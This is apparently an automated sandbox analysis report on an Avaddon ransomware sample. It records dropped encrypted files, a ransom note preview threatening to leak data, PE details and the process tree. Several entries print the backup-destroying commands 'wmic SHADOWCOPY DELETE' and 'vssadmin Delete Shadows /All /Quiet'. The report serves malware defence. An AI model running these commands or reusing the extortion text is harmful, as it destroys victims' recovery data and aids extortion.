7 days the whole downloaded info.......You can get more information on our page, which is located in a Tor hidden network..........How to get to our page...----------------------------------------------------------------------------

C:\Users\user\Searches\Everywhere.search-ms Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.976341860493078
Encrypted:	false
SSDEEP:	192:ey887N9Djak0xP3NsM9ngpVNe7GxImRAXGRzlIp9ycrpHus/e/RwFYEggg6V+Z:lzYvt90c7GSm6GRzlUEcFrjKDB
MD5:	EF982A4D6098340340B3AAD684E33432
SHA1:	56600C97984CB4465A330E69E570FDB71C567C40
SHA-256:	057D6D15E3AB1822F21E8A8CE603ACCCDD4B56E6D703766B7E12C081EA0F08AF
SHA-512:	57F72D5AEC12B7E269519E767CF41A16F1560E751273C447F77B3E7FB7E56A8670F7A59245F242FFD4384C7052BBFAC73697B82AF7603A9C4D60B44BBB3A09E4
Malicious:	false
Preview:	..O...m.E.'.5.q.H...]...&.r.~..k.+o.}{..p._~..G..L.r..!.. .:2.~...1h..1......Ie...N...7."..K..ML...WG..QY{~.z...3....0.U.......p...P..V...C10..^..G.3......<8`.9....kZU.~..e......!V"2.K.+....&...9Z.....AQ.K..z....E.'.g...[.c..]...83...~6..Ag."a.@.q..1.BW..:... $....h<...h..faH..;H.t.N@.I.+.S.cr.e.A....]t.xQ...Y.....L.....&.'.1.t}.....+v...o.....K<....9.w.&...i.(.. _.M:3F.o..=.$....%C.o..B......p_.a.g..=.H.0+.l......(lV..RO.]h.%=.\.....v....EP~l\|.Y]Uk^-..p.........XTW.'....Af....d{X#.....Mi...;..R.C.0C.XfIE....h....}..'S..Pb..Ayv.E)...B`...~ ..2..n.e+.......D..Tz..A.....d.Q......g.(......&.......7....3.1..t"........!....-p.........Nd...=.:>.O..>Y^V).O.Y.#..3..NA.~&Pq.3R9....L......l.=.X.7......B}<.J........YY.... .xH.%..'.........G{...2qx.b.2.4..i._B...;..$Pv^ti.;3..".e;X.m.E..2?...J;..o.I.,.. 'Uj.?.Z.i)....e....}t..i8F(.P1ZI.....M....%`.Dj.!....L...558\.g.q.......8.i.t..wj.R......'...b.....m..d`.(.....l{.........\|..../..rR..m...

C:\Users\user\Searches\Everywhere.search-ms.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.976341860493078
Encrypted:	false
SSDEEP:	192:ey887N9Djak0xP3NsM9ngpVNe7GxImRAXGRzlIp9ycrpHus/e/RwFYEggg6V+Z:lzYvt90c7GSm6GRzlUEcFrjKDB
MD5:	EF982A4D6098340340B3AAD684E33432
SHA1:	56600C97984CB4465A330E69E570FDB71C567C40
SHA-256:	057D6D15E3AB1822F21E8A8CE603ACCCDD4B56E6D703766B7E12C081EA0F08AF
SHA-512:	57F72D5AEC12B7E269519E767CF41A16F1560E751273C447F77B3E7FB7E56A8670F7A59245F242FFD4384C7052BBFAC73697B82AF7603A9C4D60B44BBB3A09E4
Malicious:	false
Preview:	..O...m.E.'.5.q.H...]...&.r.~..k.+o.}{..p._~..G..L.r..!.. .:2.~...1h..1......Ie...N...7."..K..ML...WG..QY{~.z...3....0.U.......p...P..V...C10..^..G.3......<8`.9....kZU.~..e......!V"2.K.+....&...9Z.....AQ.K..z....E.'.g...[.c..]...83...~6..Ag."a.@.q..1.BW..:... $....h<...h..faH..;H.t.N@.I.+.S.cr.e.A....]t.xQ...Y.....L.....&.'.1.t}.....+v...o.....K<....9.w.&...i.(.. _.M:3F.o..=.$....%C.o..B......p_.a.g..=.H.0+.l......(lV..RO.]h.%=.\.....v....EP~l\|.Y]Uk^-..p.........XTW.'....Af....d{X#.....Mi...;..R.C.0C.XfIE....h....}..'S..Pb..Ayv.E)...B`...~ ..2..n.e+.......D..Tz..A.....d.Q......g.(......&.......7....3.1..t"........!....-p.........Nd...=.:>.O..>Y^V).O.Y.#..3..NA.~&Pq.3R9....L......l.=.X.7......B}<.J........YY.... .xH.%..'.........G{...2qx.b.2.4..i._B...;..$Pv^ti.;3..".e;X.m.E..2?...J;..o.I.,.. 'Uj.?.Z.i)....e....}t..i8F(.P1ZI.....M....%`.Dj.!....L...558\.g.q.......8.i.t..wj.R......'...b.....m..d`.(.....l{.........\|..../..rR..m...

C:\Users\user\Searches\Indexed Locations.search-ms Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.978673171427752
Encrypted:	false
SSDEEP:	192:e5JYbZdg6BHGjFVI/koQ6Fu91uL8V1yewKj+uUZSFHTQ9GV+Z:eXY9dg6BYjZT9G8V1ymj+YFzQT
MD5:	F8F16067320D6B56A37957E8BE004FED
SHA1:	B632DEDFBE0FF2BE86998C67EDD7FAA8DC07B32D
SHA-256:	BD0110068A3B821070A7B6B862B0B434E56840EA22588DF3ED80C8DBDCEA448D
SHA-512:	AC02B1924EEE986461DE2219F60F1E85356B17654AE37A46A4E46C3B6B6A81084BD05D4477BE4A24936C8D4B944C1BF2177174BC19F486E67F74220230E7D46C
Malicious:	false
Preview:	U2$.7H?)Uc\|..t.o...[..7..Wlp./.#.F\.{......Fk.Z`djX..@.....D.....i......>...g..2:....z..C/......6..a.=!.b{.C.\|JF.3..._SO..5P....k.....(...].j.....z~.`Z..B........\|........._A.-W'..5Ht .;C.h.zj..F..a..l.ba.H....a.H..P.~..4....<d.;V.>....-o\|..Ih...6.........r.....)z.....+.0..gE.t..k..0....@....rP..P...W.;Q.Q..x..!............MF.>.~E. ..CaV......L.Q...m.v....v.i....9e..8..(.+./.].o......Q.."..k_\..V...:RQ...Jlg......R..N.j..`.....%.e...C....~.......P.f/..L.,.f...ML..k...O.-.....Ff@.8,Dr...G..8...I..f..$.4W9.P.N.>.O..0U.9......}...V.0.@ax..#H..=.i..............MU...........@=}..VVH......T3.T....@......."..O..I.Y.?(~z2...)]..;`.6.k.d^+{=.71.&...p..<+H.#..X..fq.{..........V:.................d...a.%..........Z........r.{_..`0W.....n...J.........;.P+i...N....d.9.D.l.;.G......o......A..r..U4.\|c......`_Gc.kYH..z...@._....0.h..)...J.c.... ......0q..$....i..\|[.2.+..AM4.9.^...O...n....\|...u.SU.g.........%...'...#.r:F..*d.m....6Q

C:\Users\user\Searches\Indexed Locations.search-ms.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.978673171427752
Encrypted:	false
SSDEEP:	192:e5JYbZdg6BHGjFVI/koQ6Fu91uL8V1yewKj+uUZSFHTQ9GV+Z:eXY9dg6BYjZT9G8V1ymj+YFzQT
MD5:	F8F16067320D6B56A37957E8BE004FED
SHA1:	B632DEDFBE0FF2BE86998C67EDD7FAA8DC07B32D
SHA-256:	BD0110068A3B821070A7B6B862B0B434E56840EA22588DF3ED80C8DBDCEA448D
SHA-512:	AC02B1924EEE986461DE2219F60F1E85356B17654AE37A46A4E46C3B6B6A81084BD05D4477BE4A24936C8D4B944C1BF2177174BC19F486E67F74220230E7D46C
Malicious:	false
Preview:	U2$.7H?)Uc\|..t.o...[..7..Wlp./.#.F\.{......Fk.Z`djX..@.....D.....i......>...g..2:....z..C/......6..a.=!.b{.C.\|JF.3..._SO..5P....k.....(...].j.....z~.`Z..B........\|........._A.-W'..5Ht .;C.h.zj..F..a..l.ba.H....a.H..P.~..4....<d.;V.>....-o\|..Ih...6.........r.....)z.....+.0..gE.t..k..0....@....rP..P...W.;Q.Q..x..!............MF.>.~E. ..CaV......L.Q...m.v....v.i....9e..8..(.+./.].o......Q.."..k_\..V...:RQ...Jlg......R..N.j..`.....%.e...C....~.......P.f/..L.,.f...ML..k...O.-.....Ff@.8,Dr...G..8...I..f..$.4W9.P.N.>.O..0U.9......}...V.0.@ax..#H..=.i..............MU...........@=}..VVH......T3.T....@......."..O..I.Y.?(~z2...)]..;`.6.k.d^+{=.71.&...p..<+H.#..X..fq.{..........V:.................d...a.%..........Z........r.{_..`0W.....n...J.........;.P+i...N....d.9.D.l.;.G......o......A..r..U4.\|c......`_Gc.kYH..z...@._....0.h..)...J.c.... ......0q..$....i..\|[.2.+..AM4.9.^...O...n....\|...u.SU.g.........%...'...#.r:F..*d.m....6Q

C:\Users\user\Searches\uCLrcwQ_readme_.txt Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	ASCII text, with very long lines, with CRLF, CR, LF line terminators
Category:	dropped
Size (bytes):	3773
Entropy (8bit):	5.733390727901314
Encrypted:	false
SSDEEP:	48:L9k0ZzV7L/vNbXGZULVDgUp4qNiiE6bm1c0rfWejhAe/YAliM3PXnLHrYxgkH69+:L95zhLNbXGZUe7Ka6pU6i9fLrvE69USy
MD5:	830B1E10F7D9AF9FBAAFDA9D0C601484
SHA1:	D1FBCE92660ACA875EC5DB91A02CDD034B79A58C
SHA-256:	78761F28E2B181A64E58D1852F32663A032D0F30FE7BF17D38A91BE7BEB4498C
SHA-512:	5C930EF247753F5AA61725DFAECF929915058E74638FA7624C2AFA04C021C86AB50598387360674634AF1042F73238E4F789610877D9B599AE0D5F74F840E657
Malicious:	false
Preview:	-------=== Your network has been infected! ===-------.........*************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED ***************.........All your documents, photos, databases and other important files have been encrypted and have the extension: .bCcBDeabea......You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files!......The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files!......We have also downloaded a lot of private data from your network....If you do not contact as in a 3 days we will post information about your breach on our public news website (avaddongun7rngel.onion) and after 7 days the whole downloaded info.......You can get more information on our page, which is located in a Tor hidden network..........How to get to our page...----------------------------------------------------------------------------

\Device\ConDrv Download File
Process:	C:\Windows\SysWOW64\wbem\WMIC.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	48
Entropy (8bit):	4.305255793112395
Encrypted:	false
SSDEEP:	3:8yzGc7C1RREal:nzGtRV
MD5:	6ED2062D4FB53D847335AE403B23BE62
SHA1:	C3030ED2C3090594869691199F46BE7A9A12E035
SHA-256:	43B5390113DCBFA597C4AAA154347D72F660DB5F2A0398EB3C1D35793E8220B9
SHA-512:	C9C302215394FEC0B38129280A8303E0AF46BA71B75672665D89828C6F68A54E18430F953CE36B74F50DC0F658CA26AC3572EA60F9E6714AFFC9FB623E3C54FC
Malicious:	false
Preview:	ERROR:...Description = Initialization failure...

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.16411908069709
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ab.exe
File size:	794112
MD5:	0b486fe0503524cfe4726a4022fa6a68
SHA1:	297dea71d489768ce45d23b0f8a45424b469ab00
SHA256:	1228d0f04f0ba82569fc1c0609f9fd6c377a91b9ea44c1e7f9f84b2b90552da2
SHA512:	f4273ca5cc3a9360af67f4b4ee0bf067cf218c5dc8caeafbfa1b809715effe742f2e1f54e4fe9ec8d4b8e3ae697d57f91c2b49bdf203648508d75d4a76f53619
SSDEEP:	24576:TCs99+OXLpMePfI8TgmBTCDqEbOpPtpFhyxfq:5GOXLpMePfzVTCD7gPtLhSfq
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9.I.}.'}}.'}}.'}i.$\|l.'}i."\|..'}i.#\|j.'}i.!\|..'}..#\|l.'}..$\|k.'}.."\|..'}i.&\|j.'}}.&}..'}...\|l.'}...}\|.'}}..}\|.'}..%\|\|.'}Rich}.'

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x43f186
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x60689947 [Sat Apr 3 16:35:19 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	b56503b8c4f46a3a086734c09c6bd0f3

Entrypoint Preview

Instruction
call 00007F7564D21E0Fh
jmp 00007F7564D2148Fh
mov ecx, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
mov ecx, dword ptr [ebp-10h]
xor ecx, ebp
call 00007F7564D20EDFh
jmp 00007F7564D215F0h
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [004B4018h]
xor eax, ebp
push eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [004B4018h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [004B4018h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], esp
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb20a0	0xf0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xbc000	0x5d8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xbd000	0x8d44	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xa6e2c	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa6e68	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x84000	0x358	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8284c	0x82a00	False	0.488630756579	data	6.60983970569	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x84000	0x2f3d6	0x2f400	False	0.264529596561	data	3.62244340935	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xb4000	0x7818	0x6800	False	0.106745793269	data	3.31661959005	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xbc000	0x5d8	0x600	False	0.453125	data	4.07117757835	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xbd000	0x8d44	0x8e00	False	0.518926056338	data	6.64901147486	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0xbc0a0	0x3ac	data	English	United States
RT_MANIFEST	0xbc450	0x188	XML 1.0 document text	English	United States

Imports

DLL	Import
KERNEL32.dll	GetVolumeInformationW, WriteFile, CreateFileW, ReadFile, GetFileSizeEx, GetQueuedCompletionStatus, GetFileAttributesW, PostQueuedCompletionStatus, SetFileAttributesW, GetSystemInfo, SetFilePointerEx, MoveFileExW, CreateIoCompletionPort, FindFirstFileW, FindNextFileW, GetEnvironmentVariableW, FindClose, GetDiskFreeSpaceW, GetLocaleInfoA, GetComputerNameA, WriteConsoleW, GetTickCount, OpenMutexW, CopyFileW, CreateProcessW, GetProcessHeap, GetThreadContext, HeapAlloc, CloseHandle, Process32FirstW, GetCurrentThread, Process32NextW, GetLastError, Sleep, CreateToolhelp32Snapshot, CheckRemoteDebuggerPresent, WaitForSingleObject, CreateMutexW, GetModuleFileNameW, TerminateProcess, GetCurrentProcess, HeapFree, WideCharToMultiByte, MultiByteToWideChar, FindNextVolumeW, GetVolumePathNamesForVolumeNameW, FindVolumeClose, SetVolumeMountPointW, FindFirstVolumeW, HeapSize, GetConsoleMode, GetConsoleOutputCP, FlushFileBuffers, SetStdHandle, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, FindFirstFileExW, GetFileType, GetTimeZoneInformation, HeapReAlloc, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, OpenProcess, IsDebuggerPresent, GetTimeFormatW, GetDateFormatW, GetStdHandle, ExitProcess, GetModuleHandleExW, ExitThread, RaiseException, RtlUnwind, LoadLibraryW, UnregisterWaitEx, QueryDepthSList, InterlockedFlushSList, QueryDosDeviceW, GetLogicalDrives, EnterCriticalSection, LeaveCriticalSection, TryEnterCriticalSection, DeleteCriticalSection, GetCurrentThreadId, WaitForSingleObjectEx, SwitchToThread, GetExitCodeThread, GetStringTypeW, QueryPerformanceCounter, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetModuleHandleW, GetProcAddress, EncodePointer, DecodePointer, GetCPInfo, LocalFree, CompareStringW, LCMapStringW, GetLocaleInfoW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetStartupInfoW, GetCurrentProcessId, InitializeSListHead, CreateTimerQueue, SetEvent, SignalObjectAndWait, CreateThread, SetThreadPriority, GetThreadPriority, GetLogicalProcessorInformation, CreateTimerQueueTimer, ChangeTimerQueueTimer, DeleteTimerQueueTimer, GetNumaHighestNodeNumber, GetProcessAffinityMask, SetThreadAffinityMask, RegisterWaitForSingleObject, UnregisterWait, GetThreadTimes, FreeLibrary, FreeLibraryAndExitThread, GetModuleHandleA, LoadLibraryExW, GetVersionExW, VirtualAlloc, VirtualProtect, VirtualFree, DuplicateHandle, ReleaseSemaphore, InterlockedPopEntrySList, InterlockedPushEntrySList
ADVAPI32.dll	ControlService, OpenServiceW, GetTokenInformation, CryptDuplicateKey, CryptSetKeyParam, CryptDestroyKey, CryptAcquireContextW, CryptEncrypt, CryptExportKey, CryptImportKey, CryptGenKey, CryptReleaseContext, LookupPrivilegeValueW, AdjustTokenPrivileges, InitiateShutdownW, RegCloseKey, CloseServiceHandle, OpenSCManagerW, DeleteService, RegOpenKeyExW, EnumDependentServicesW, RegSetValueExW, OpenProcessToken, StartServiceW, QueryServiceStatusEx
SHELL32.dll	SHEmptyRecycleBinW, ShellExecuteW
ole32.dll	CoInitializeEx, CoUninitialize, CoCreateInstance, CoInitializeSecurity, CoSetProxyBlanket
OLEAUT32.dll	VariantClear, SysAllocString, SysFreeString, SysAllocStringByteLen, VariantInit, SysStringByteLen
MPR.dll	WNetGetConnectionW
NETAPI32.dll	NetDfsEnum, NetShareEnum, NetApiBufferFree
IPHLPAPI.DLL	SendARP
WS2_32.dll	gethostbyname, gethostname, inet_addr, htons, getnameinfo, WSACleanup, inet_ntoa, WSAStartup
RstrtMgr.DLL	RmEndSession, RmShutdown, RmGetList, RmStartSession, RmRegisterResources
CRYPT32.dll	CryptStringToBinaryA

Version Infos

Description	Data
LegalCopyright	Microsoft Corporation. All rights reserved.
InternalName	taskhost.exe
FileVersion	10.0.17763.831 (WinBuild.160101.0800)
CompanyName	Microsoft Corporation
ProductName	Microsoft Windows Operating System
ProductVersion	10.0.17763.831
FileDescription	Host Process for Windows Tasks
OriginalFilename	taskhost.exe
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: ab.exe PID: 6212 Parent PID: 2008

General

Start time:	16:47:33
Start date:	06/01/2022
Path:	C:\Users\user\Desktop\ab.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ab.exe"
Imagebase:	0x10e0000
File size:	794112 bytes
MD5 hash:	0B486FE0503524CFE4726A4022FA6A68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: 00000000.00000003.317257973.00000000043E8000.00000004.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: 00000000.00000003.316985824.00000000043E8000.00000004.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000000.00000003.324241984.00000000007E5000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: 00000000.00000003.324241984.00000000007E5000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000000.00000003.315481275.00000000007E5000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: 00000000.00000003.315481275.00000000007E5000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: 00000000.00000003.321019974.0000000004DB7000.00000004.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000000.00000003.349826144.00000000007E5000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: 00000000.00000003.349826144.00000000007E5000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000000.00000003.354766251.00000000007E5000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: 00000000.00000003.354766251.00000000007E5000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: 00000000.00000003.321639243.0000000004DB7000.00000004.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: 00000000.00000003.321666234.0000000004DB7000.00000004.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: 00000000.00000003.316551039.00000000043E8000.00000004.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: 00000000.00000003.317170385.00000000043E8000.00000004.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: 00000000.00000003.321142835.0000000004DB7000.00000004.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: 00000000.00000003.336845609.000000000083D000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: 00000000.00000003.324338080.000000000083D000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: ab.exe PID: 4876 Parent PID: 664

General

Start time:	16:47:34
Start date:	06/01/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe
Imagebase:	0x12f0000
File size:	794112 bytes
MD5 hash:	0B486FE0503524CFE4726A4022FA6A68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: 00000002.00000002.309597830.000000000069A000.00000004.00000020.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 88%, Virustotal, Browse Detection: 66%, Metadefender, Browse Detection: 96%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: WMIC.exe PID: 4520 Parent PID: 3040

General

Start time:	16:47:35
Start date:	06/01/2022
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic SHADOWCOPY DELETE /nointeractive
Imagebase:	0x7ff6dc4e0000
File size:	521728 bytes
MD5 hash:	EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: WMIC.exe PID: 4800 Parent PID: 3040

General

Start time:	16:47:36
Start date:	06/01/2022
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic SHADOWCOPY DELETE /nointeractive
Imagebase:	0x7ff6dc4e0000
File size:	521728 bytes
MD5 hash:	EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 5876 Parent PID: 4520

General

Start time:	16:47:36
Start date:	06/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WMIC.exe PID: 3148 Parent PID: 3040

General

Start time:	16:47:36
Start date:	06/01/2022
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic SHADOWCOPY DELETE /nointeractive
Imagebase:	0x7ff6dc4e0000
File size:	521728 bytes
MD5 hash:	EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 4768 Parent PID: 4800

General

Start time:	16:47:36
Start date:	06/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WMIC.exe PID: 1744 Parent PID: 6212

General

Start time:	16:47:37
Start date:	06/01/2022
Path:	C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):	true
Commandline:	wmic SHADOWCOPY DELETE /nointeractive
Imagebase:	0x950000
File size:	391680 bytes
MD5 hash:	79A01FCD1C8166C5642F37D1E0FB7BA8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 1756 Parent PID: 3148

General

Start time:	16:47:37
Start date:	06/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 7084 Parent PID: 1744

General

Start time:	16:47:37
Start date:	06/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vssadmin.exe PID: 5468 Parent PID: 6212

General

Start time:	16:47:38
Start date:	06/01/2022
Path:	C:\Windows\SysWOW64\vssadmin.exe
Wow64 process (32bit):	true
Commandline:	vssadmin Delete Shadows /All /Quiet
Imagebase:	0x13b0000
